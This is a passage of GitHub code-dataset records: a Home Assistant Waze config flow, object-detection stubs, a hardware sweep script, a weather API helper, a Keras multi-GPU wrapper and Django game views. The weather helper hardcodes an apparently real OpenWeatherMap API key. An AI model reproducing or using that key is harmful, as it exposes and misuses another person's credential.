"dataset": "github-code", "pt": "41", "api": [{"api_name": "json.dumps", "line_number": 9, "usage_type": "call"}, {"api_name": "genericpath.exists", "line_number": 16, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "7206403357", "text": "\"\"\"Config flow for Waze Travel Time integration.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nimport voluptuous as vol\n\nfrom homeassistant import config_entries\nfrom homeassistant.const import CONF_NAME, CONF_REGION\nfrom homeassistant.core import HomeAssistant, callback\nimport homeassistant.helpers.config_validation as cv\n\nfrom .const import (\n CONF_AVOID_FERRIES,\n CONF_AVOID_SUBSCRIPTION_ROADS,\n CONF_AVOID_TOLL_ROADS,\n CONF_DESTINATION,\n CONF_EXCL_FILTER,\n CONF_INCL_FILTER,\n CONF_ORIGIN,\n CONF_REALTIME,\n CONF_UNITS,\n CONF_VEHICLE_TYPE,\n DEFAULT_AVOID_FERRIES,\n DEFAULT_AVOID_SUBSCRIPTION_ROADS,\n DEFAULT_AVOID_TOLL_ROADS,\n DEFAULT_NAME,\n DEFAULT_REALTIME,\n DEFAULT_VEHICLE_TYPE,\n DOMAIN,\n REGIONS,\n UNITS,\n VEHICLE_TYPES,\n)\nfrom .helpers import is_valid_config_entry\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef is_dupe_import(\n hass: HomeAssistant, entry: config_entries.ConfigEntry, user_input: dict[str, Any]\n) -> bool:\n \"\"\"Return whether imported config already exists.\"\"\"\n entry_data = {**entry.data, **entry.options}\n defaults = {\n CONF_REALTIME: DEFAULT_REALTIME,\n CONF_VEHICLE_TYPE: DEFAULT_VEHICLE_TYPE,\n CONF_UNITS: hass.config.units.name,\n CONF_AVOID_FERRIES: DEFAULT_AVOID_FERRIES,\n CONF_AVOID_SUBSCRIPTION_ROADS: DEFAULT_AVOID_SUBSCRIPTION_ROADS,\n CONF_AVOID_TOLL_ROADS: DEFAULT_AVOID_TOLL_ROADS,\n }\n\n for key in (\n CONF_ORIGIN,\n CONF_DESTINATION,\n CONF_REGION,\n CONF_INCL_FILTER,\n CONF_EXCL_FILTER,\n CONF_REALTIME,\n CONF_VEHICLE_TYPE,\n CONF_UNITS,\n CONF_AVOID_FERRIES,\n CONF_AVOID_SUBSCRIPTION_ROADS,\n CONF_AVOID_TOLL_ROADS,\n ):\n # If the key is present the check is simple\n if key in user_input and user_input[key] != entry_data[key]:\n return False\n\n # If the key is not present, then we have to check if the key has a default and\n # if the default is in the options. If it doesn't have a default, we have to check\n # if the key is in the options\n if key not in user_input:\n if key in defaults and defaults[key] != entry_data[key]:\n return False\n\n if key not in defaults and key in entry_data:\n return False\n\n return True\n\n\nclass WazeOptionsFlow(config_entries.OptionsFlow):\n \"\"\"Handle an options flow for Waze Travel Time.\"\"\"\n\n def __init__(self, config_entry: config_entries.ConfigEntry) -> None:\n \"\"\"Initialize waze options flow.\"\"\"\n self.config_entry = config_entry\n\n async def async_step_init(self, user_input=None):\n \"\"\"Handle the initial step.\"\"\"\n if user_input is not None:\n return self.async_create_entry(\n title=\"\",\n data={k: v for k, v in user_input.items() if v not in (None, \"\")},\n )\n\n return self.async_show_form(\n step_id=\"init\",\n data_schema=vol.Schema(\n {\n vol.Optional(\n CONF_INCL_FILTER,\n default=self.config_entry.options.get(CONF_INCL_FILTER, \"\"),\n ): cv.string,\n vol.Optional(\n CONF_EXCL_FILTER,\n default=self.config_entry.options.get(CONF_EXCL_FILTER, \"\"),\n ): cv.string,\n vol.Optional(\n CONF_REALTIME,\n default=self.config_entry.options[CONF_REALTIME],\n ): cv.boolean,\n vol.Optional(\n CONF_VEHICLE_TYPE,\n default=self.config_entry.options[CONF_VEHICLE_TYPE],\n ): vol.In(VEHICLE_TYPES),\n vol.Optional(\n CONF_UNITS,\n default=self.config_entry.options[CONF_UNITS],\n ): vol.In(UNITS),\n vol.Optional(\n CONF_AVOID_TOLL_ROADS,\n default=self.config_entry.options[CONF_AVOID_TOLL_ROADS],\n ): cv.boolean,\n vol.Optional(\n CONF_AVOID_SUBSCRIPTION_ROADS,\n default=self.config_entry.options[\n CONF_AVOID_SUBSCRIPTION_ROADS\n ],\n ): cv.boolean,\n vol.Optional(\n CONF_AVOID_FERRIES,\n default=self.config_entry.options[CONF_AVOID_FERRIES],\n ): cv.boolean,\n }\n ),\n )\n\n\nclass ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):\n \"\"\"Handle a config flow for Waze Travel Time.\"\"\"\n\n VERSION = 1\n\n @staticmethod\n @callback\n def async_get_options_flow(\n config_entry: config_entries.ConfigEntry,\n ) -> WazeOptionsFlow:\n \"\"\"Get the options flow for this handler.\"\"\"\n return WazeOptionsFlow(config_entry)\n\n async def async_step_user(self, user_input=None):\n \"\"\"Handle the initial step.\"\"\"\n errors = {}\n user_input = user_input or {}\n\n if user_input:\n # We need to prevent duplicate imports\n if self.source == config_entries.SOURCE_IMPORT and any(\n is_dupe_import(self.hass, entry, user_input)\n for entry in self.hass.config_entries.async_entries(DOMAIN)\n if entry.source == config_entries.SOURCE_IMPORT\n ):\n return self.async_abort(reason=\"already_configured\")\n\n if (\n self.source == config_entries.SOURCE_IMPORT\n or await self.hass.async_add_executor_job(\n is_valid_config_entry,\n self.hass,\n _LOGGER,\n user_input[CONF_ORIGIN],\n user_input[CONF_DESTINATION],\n user_input[CONF_REGION],\n )\n ):\n return self.async_create_entry(\n title=user_input.get(CONF_NAME, DEFAULT_NAME),\n data=user_input,\n )\n\n # If we get here, it's because we couldn't connect\n errors[\"base\"] = \"cannot_connect\"\n\n return self.async_show_form(\n step_id=\"user\",\n data_schema=vol.Schema(\n {\n vol.Required(\n CONF_NAME, default=user_input.get(CONF_NAME, DEFAULT_NAME)\n ): cv.string,\n vol.Required(CONF_ORIGIN): cv.string,\n vol.Required(CONF_DESTINATION): cv.string,\n vol.Required(CONF_REGION): vol.In(REGIONS),\n }\n ),\n errors=errors,\n )\n\n async_step_import = async_step_user\n", "repo_name": "NisaarAgharia/home.AI", "sub_path": "homeassistant/components/waze_travel_time/config_flow.py", "file_name": "config_flow.py", "file_ext": "py", "file_size_in_byte": 6933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 38, "usage_type": "call"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 42, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 42, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "const.CONF_REALTIME", "line_number": 47, "usage_type": "name"}, {"api_name": "const.CONF_VEHICLE_TYPE", "line_number": 48, "usage_type": "name"}, {"api_name": "const.CONF_UNITS", "line_number": 49, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_FERRIES", "line_number": 50, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_SUBSCRIPTION_ROADS", "line_number": 51, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_TOLL_ROADS", "line_number": 52, "usage_type": "name"}, {"api_name": "const.DEFAULT_REALTIME", "line_number": 47, "usage_type": "name"}, {"api_name": "const.DEFAULT_VEHICLE_TYPE", "line_number": 48, "usage_type": "name"}, {"api_name": "const.DEFAULT_AVOID_FERRIES", "line_number": 50, "usage_type": "name"}, {"api_name": "const.DEFAULT_AVOID_SUBSCRIPTION_ROADS", "line_number": 51, "usage_type": "name"}, {"api_name": "const.DEFAULT_AVOID_TOLL_ROADS", "line_number": 52, "usage_type": "name"}, {"api_name": "const.CONF_ORIGIN", "line_number": 56, "usage_type": "name"}, {"api_name": "const.CONF_DESTINATION", "line_number": 57, "usage_type": "name"}, {"api_name": "homeassistant.const.CONF_REGION", "line_number": 58, "usage_type": "name"}, {"api_name": "const.CONF_INCL_FILTER", "line_number": 59, "usage_type": "name"}, {"api_name": "const.CONF_EXCL_FILTER", "line_number": 60, "usage_type": "name"}, {"api_name": "const.CONF_REALTIME", "line_number": 61, "usage_type": "name"}, {"api_name": "const.CONF_VEHICLE_TYPE", "line_number": 62, "usage_type": "name"}, {"api_name": "const.CONF_UNITS", "line_number": 63, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_FERRIES", "line_number": 64, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_SUBSCRIPTION_ROADS", "line_number": 65, "usage_type": "name"}, {"api_name": "const.CONF_AVOID_TOLL_ROADS", "line_number": 66, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.OptionsFlow", "line_number": 85, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 85, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 88, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 88, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 102, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 104, "usage_type": "call"}, {"api_name": "const.CONF_INCL_FILTER", "line_number": 105, "usage_type": "argument"}, {"api_name": "const.CONF_INCL_FILTER", "line_number": 106, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 108, "usage_type": "call"}, {"api_name": "const.CONF_EXCL_FILTER", "line_number": 109, "usage_type": "argument"}, {"api_name": "const.CONF_EXCL_FILTER", "line_number": 110, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 112, "usage_type": "call"}, {"api_name": "const.CONF_REALTIME", "line_number": 113, "usage_type": "argument"}, {"api_name": "const.CONF_REALTIME", "line_number": 114, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 116, "usage_type": "call"}, {"api_name": "const.CONF_VEHICLE_TYPE", "line_number": 117, "usage_type": "argument"}, {"api_name": "const.CONF_VEHICLE_TYPE", "line_number": 118, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 120, "usage_type": "call"}, {"api_name": "const.CONF_UNITS", "line_number": 121, "usage_type": "argument"}, {"api_name": "const.CONF_UNITS", "line_number": 122, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 124, "usage_type": "call"}, {"api_name": "const.CONF_AVOID_TOLL_ROADS", "line_number": 125, "usage_type": "argument"}, {"api_name": "const.CONF_AVOID_TOLL_ROADS", "line_number": 126, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 128, "usage_type": "call"}, {"api_name": "const.CONF_AVOID_SUBSCRIPTION_ROADS", "line_number": 129, "usage_type": "argument"}, {"api_name": "const.CONF_AVOID_SUBSCRIPTION_ROADS", "line_number": 131, "usage_type": "name"}, {"api_name": "voluptuous.Optional", "line_number": 134, "usage_type": "call"}, {"api_name": "const.CONF_AVOID_FERRIES", "line_number": 135, "usage_type": "argument"}, {"api_name": "const.CONF_AVOID_FERRIES", "line_number": 136, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 107, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 107, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 111, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 111, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 115, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 115, "usage_type": "name"}, {"api_name": "voluptuous.In", "line_number": 119, "usage_type": "call"}, {"api_name": "const.VEHICLE_TYPES", "line_number": 119, "usage_type": "argument"}, {"api_name": "voluptuous.In", "line_number": 123, "usage_type": "call"}, {"api_name": "const.UNITS", "line_number": 123, "usage_type": "argument"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 127, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 127, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 133, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 133, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 137, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 137, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigFlow", "line_number": 143, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 143, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 143, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 151, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 151, "usage_type": "name"}, {"api_name": "homeassistant.core.callback", "line_number": 149, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.SOURCE_IMPORT", "line_number": 163, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 163, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 165, "usage_type": "argument"}, {"api_name": "homeassistant.config_entries.SOURCE_IMPORT", "line_number": 166, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 166, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.SOURCE_IMPORT", "line_number": 171, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 171, "usage_type": "name"}, {"api_name": "helpers.is_valid_config_entry", "line_number": 173, "usage_type": "argument"}, {"api_name": "const.CONF_ORIGIN", "line_number": 176, "usage_type": "name"}, {"api_name": "const.CONF_DESTINATION", "line_number": 177, "usage_type": "name"}, {"api_name": "homeassistant.const.CONF_REGION", "line_number": 178, "usage_type": "name"}, {"api_name": "homeassistant.const.CONF_NAME", "line_number": 182, "usage_type": "argument"}, {"api_name": "const.DEFAULT_NAME", "line_number": 182, "usage_type": "argument"}, {"api_name": "voluptuous.Schema", "line_number": 191, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 193, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_NAME", "line_number": 194, "usage_type": "argument"}, {"api_name": "const.DEFAULT_NAME", "line_number": 194, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 196, "usage_type": "call"}, {"api_name": "const.CONF_ORIGIN", "line_number": 196, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 197, "usage_type": "call"}, {"api_name": "const.CONF_DESTINATION", "line_number": 197, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 198, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_REGION", "line_number": 198, "usage_type": "argument"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 195, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 195, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 196, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 196, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 197, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 197, "usage_type": "name"}, {"api_name": "voluptuous.In", "line_number": 198, "usage_type": "call"}, {"api_name": "const.REGIONS", "line_number": 198, "usage_type": "argument"}]} +{"seq_id": "4148838973", "text": "import torch\nfrom torch import nn\nfrom typing import Any, List\nfrom object_detection.entities import YoloBoxes, PascalBoxes\n\n\ndef centerness(boxes: torch.Tensor) -> torch.Tensor:\n left_right = boxes[:, [0, 2]]\n top_bottom = boxes[:, [1, 3]]\n return torch.sqrt(\n (left_right.min(-1)[0] / left_right.max(-1)[0])\n * (top_bottom.min(-1)[0] / top_bottom.max(-1)[0])\n )\n\n\nclass ToBoxes:\n def __init__(\n self,\n threshold: float,\n top_n: int,\n nms_thresold: float,\n post_top_n: int,\n min_size: float,\n n_classes: int,\n ) -> None:\n self.threshold = threshold\n self.top_n = top_n\n self.nms_thresold = nms_thresold\n self.post_top_n = post_top_n\n self.min_size = min_size\n self.n_classes = n_classes\n\n def __call__(\n self, cls_batch: List[Any], box_batch: List[Any], center_batch: List[Any],\n ) -> List[YoloBoxes]:\n ...\n\n\nclass Criterion:\n def __init__(self, sizes: Any, gamma: float, alpha: float,) -> None:\n self.sizes = sizes\n self.gamma = gamma\n self.alpha = alpha\n\n def get_sample_region(\n self,\n gt_boxes: PascalBoxes,\n strides: List[int],\n point_per_level: int,\n xs: torch.Tensor,\n ys: torch.Tensor,\n radius: float,\n ) -> torch.Tensor:\n ...\n", "repo_name": "zhangyahui520/object-detection", "sub_path": "object_detection/models/fcos.py", "file_name": "fcos.py", "file_ext": "py", "file_size_in_byte": 1365, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.Tensor", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "object_detection.entities.YoloBoxes", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 40, "usage_type": "name"}, {"api_name": "object_detection.entities.PascalBoxes", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 53, "usage_type": "attribute"}]} +{"seq_id": "42936390138", "text": "import os\nimport time\nimport subprocess\nimport statistics\n\nstep = float(input(\"Input step size: \"))\nstranl = float(input(\"Input lower bound of scanned range: \"))\nstranh = float(input(\"Input upper bound of scanned range: \"))\n\nreadstddev = {}\nsweep = stranl\nlpfb = step\nwhile lpfb < stranh:\n\tprint(lpfb)\n\tout = subprocess.call(['./adc.bin', '/dev/spidev1.0', str(lpfb), '>', 'test.txt'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n\tread_list = []\n\twith open('test.txt') as fp:\n\t\tfor line in fp:\n\t\t\tread_list.append(line)\n\t\t\tprint(line)\n\treadstddev[sweep] = statistics.stdev(read_list)\n\tlpfb=lpfb+step\n\t\nbest = min(readstddev, key=readstddev.get)\nprint(\"Best lambda in sweep: \", best, \" with a std dev of \", readstddev[best])\n", "repo_name": "sho0p/maxim1246acpe_read", "sub_path": "sweep.py", "file_name": "sweep.py", "file_ext": "py", "file_size_in_byte": 728, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "subprocess.call", "line_number": 15, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "statistics.stdev", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "28466525154", "text": "import json,requests\nimport asyncio,aiohttp\nfrom datetime import datetime\n\napi_key = \"1835a413e20e6815f4ebd37b86aad3cf\"\n\ndef get_part_of_day(hour):\n return (\n \"morning\" if 5 <= hour <= 11\n else\n \"afternoon\" if 12 <= hour <= 17\n else\n \"evening\" if 18 <= hour <= 22\n else\n \"night\"\n )\n\ndef get_weather_str_from_list(list_weather):\n return ','.join(\n list(map(lambda x: x['main'], list_weather))\n )\n\ndef get_coord(city:str):\n cities = \"src/city.id.json\"\n data = json.loads(open(cities).read())\n return list(filter(lambda x:x[\"name\"].lower() == city.lower(),data))\n\n\ndef get_formated_from_timestamp(timestamp, format : str = None):\n date_time = datetime.fromtimestamp(timestamp)\n if format is None:\n format = \"%A, %B %d, %Y %H:%M:%S\"\n return date_time.strftime(format)\n\ndef get_current_weather(lat,lon,temp=\"default\"):\n url = \"https://api.openweathermap.org/data/2.5/weather?lat=%s&lon=%s&appid=%s&units=%s\" % (lat, lon, api_key, temp)\n response = requests.get(url)\n return json.loads(response.text)\n\ndef get_current_weather_hourly(lat,lon):\n url = \"https://api.openweathermap.org/data/2.5/onecall?lat=%s&lon=%s&appid=%s\" % (lat, lon, api_key)\n response = requests.get(url)\n return json.loads(response.text)\n \nasync def fetch_async(session, url,params={}):\n async with session.get(url,params=params) as response:\n return await response.json()\n\nasync def get_current_weather_async(lat,lon):\n params = {\"lat\": lat,\"lon\": lon,\"appid\": api_key}\n url = \"https://api.openweathermap.org/data/2.5/weather\"\n async with aiohttp.ClientSession() as session:\n async with session.get(url,params=params) as response:\n # print(response.)\n return response.json()\n\n\n", "repo_name": "subhandp/python-tryout", "sub_path": "src/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1803, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "16561873742", "text": "from keras import Model\nfrom keras.utils import multi_gpu_model\n\n'''\nKeras2.2.4 fix this bug.\n\n为了解决multi_gpu checkpoint 的保存问题, 保存的时候用原来的模型保存\nhttps://keras.io/LIBS/#multi_gpu_model\n\nmulti_gpu_model\nkeras.LIBS.multi_gpu_model(model, gpus=None, cpu_merge=True, cpu_relocation=False)\n\nReplicates a model on different GPUs.\nSpecifically, this function implements single-machine multi-GPU data1 parallelism. It works in the following way:\n\nDivide the model's input(s) into multiple sub-batches.\nApply a model copy on each sub-batch. Every model copy is executed on a dedicated GPU.\nConcatenate the results (on CPU) into one big batch.\n\n'''\n\n\nclass ModelMGPU(Model):\n def __init__(self, ser_model, gpus):\n pmodel = multi_gpu_model(ser_model, gpus)\n self.__dict__.update(pmodel.__dict__)\n self._smodel = ser_model\n\n def __getattribute__(self, attrname):\n '''Override load and save methods to be used from the serial-model. The\n serial-model holds references to the weights in the multi-gpu model.\n '''\n # return Model.__getattribute__(self, attrname)\n if 'load' in attrname or 'save' in attrname:\n return getattr(self._smodel, attrname)\n\n return super(ModelMGPU, self).__getattribute__(attrname)\n", "repo_name": "linchundan88/fundus_multiple_diseases", "sub_path": "LIBS/CNN_Models/my_multi_gpu.py", "file_name": "my_multi_gpu.py", "file_ext": "py", "file_size_in_byte": 1312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "keras.Model", "line_number": 23, "usage_type": "name"}, {"api_name": "keras.utils.multi_gpu_model", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "17197200547", "text": "from django.shortcuts import get_object_or_404\nfrom rest_framework import status\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\n\nfrom . import serializers\nfrom . import models\nfrom . import logic\nfrom . import pagination\n\nclass GameViewSet(viewsets.ModelViewSet):\n queryset = models.Game.objects.all()\n serializer_class = serializers.GameSerializer\n pagination_class = pagination.CustomResultsSetPagination\n\n @action(detail=True, methods=['get', 'post', 'delete'])\n def player(self, request, pk=None):\n if request.method == 'DELETE':\n return self.player_delete(request, pk)\n elif request.method == 'POST':\n return self.player_add(request, pk)\n return self.player_list(request, pk)\n\n def player_add(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.LOBBY)\n player = models.Player.objects.filter(game_id=pk, user=request.user)\n if not player:\n new_player = models.Player()\n new_player.game = game\n new_player.user = request.user\n new_player.save()\n serializer = serializers.PlayerSerializer(new_player)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n raise ValidationError({ 'detail': 'already registered'})\n\n def player_delete(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.LOBBY)\n player = models.Player.objects.filter(game_id=pk, user=request.user)\n if player:\n player.delete()\n content = {'detail': 'deleted'}\n return Response({}, status=status.HTTP_200_OK)\n raise ValidationError({ 'detail': 'not registered'})\n\n\n def player_list(self, request, pk=None):\n game = self.get_game_or_error(pk)\n players = models.Player.objects.filter(game_id=pk)\n serializer = serializers.PlayerSerializer(players, many=True)\n return Response(serializer.data)\n\n @action(detail=True, methods=['post'])\n def start(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.LOBBY)\n player = self.get_request_user_is_game_player_or_400(request, game)\n players = models.Player.objects.filter(game_id=pk)\n if players:\n helper = logic.Start(game, players)\n helper.process()\n serializer = serializers.GameSerializer(game)\n return Response(serializer.data)\n raise ValidationError({ 'detail': 'no players'})\n\n @action(detail=True, methods=['get'])\n def pieces(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.LOBBY, False)\n pieces = models.GamePiece.objects.filter(game_id=pk).order_by('order')\n serializer = serializers.GamePieceSerializer(pieces, many=True)\n return Response(serializer.data)\n\n @action(detail=True, methods=['post'])\n def rotatesparesquare(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n self.get_request_user_is_current_player_or_400(request, game)\n helper = logic.RotateSpareSquare(pk)\n return helper.process()\n\n @action(detail=True, methods=['post'])\n def insertsparesquare(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n current_player = self.get_request_user_is_current_player_or_400(request, game)\n insert_into = request.data.get('insert_into', False)\n insert_at = request.data.get('insert_at', False)\n helper = logic.InsertSpareSquare(game, current_player, insert_into, insert_at)\n helper.process()\n game_pieces = models.GamePiece.objects.filter(game_id=pk).order_by('order')\n serializer = serializers.GamePieceSerializer(game_pieces, many=True)\n return Response(serializer.data)\n\n\n @action(detail=True, methods=['get'])\n def collectableitems(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n items = models.CollectableItem.objects.filter(gamepiece__game_id = pk)\n serializer = serializers.CollectableItemSerializer(items, many=True)\n return Response(serializer.data)\n\n @action(detail=True, methods=['post'])\n def finishturn(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n current_player = self.get_request_user_is_current_player_or_400(request, game)\n helper = logic.FinishTurn(game, current_player)\n helper.process()\n players = models.Player.objects.filter(game_id = pk)\n serializer = serializers.PlayerSerializer(players, many=True)\n return Response(serializer.data)\n\n @action(detail=True, methods=['post'])\n def movecounter(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n player = self.get_request_user_is_current_player_or_400(request, game)\n helper = logic.MoveCounter(request, pk, player)\n helper.process()\n serializer = serializers.PlayerSerializer(player, many=False)\n return Response({ 'data': serializer.data })\n\n\n def get_game_or_error(self, pk, status=None, is_equal=True):\n game = get_object_or_404(models.Game, pk=pk)\n if status == None:\n return game\n if is_equal and game.status == status:\n return game\n elif not is_equal and game.status != status:\n return game\n else:\n raise ValidationError({ 'detail': 'operation not allowed on game at this time.'})\n\n def get_request_user_is_current_player_or_400(self, request, game):\n if game.current_player.user == request.user:\n return game.current_player\n else:\n raise ValidationError({ 'detail': 'not current player' })\n\n def get_request_user_is_game_player_or_400(self, request, game):\n player = models.Player.objects.filter(game_id=game.id, user_id=request.user.id)\n if not player:\n raise ValidationError({ 'detail': 'not a player of the given game' })\n return player\n\nclass ShapeViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.GamePieceShape.objects.all()\n serializer_class = serializers.GamePieceShapeSerializer\n pagination_class = None\n\nclass OrientationViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.GamePieceOrientation.objects.all()\n serializer_class = serializers.GamePieceOrientationSerializer\n pagination_class = None\n\nclass CollectableItemViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.CollectableItem.objects.all()\n serializer_class = serializers.CollectableItemSerializer\n", "repo_name": "alexc-royle/drf-channels-labyrinth", "sub_path": "backend/game/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 44, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 45, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 52, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 63, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 54, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 71, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 90, "usage_type": "call"}, 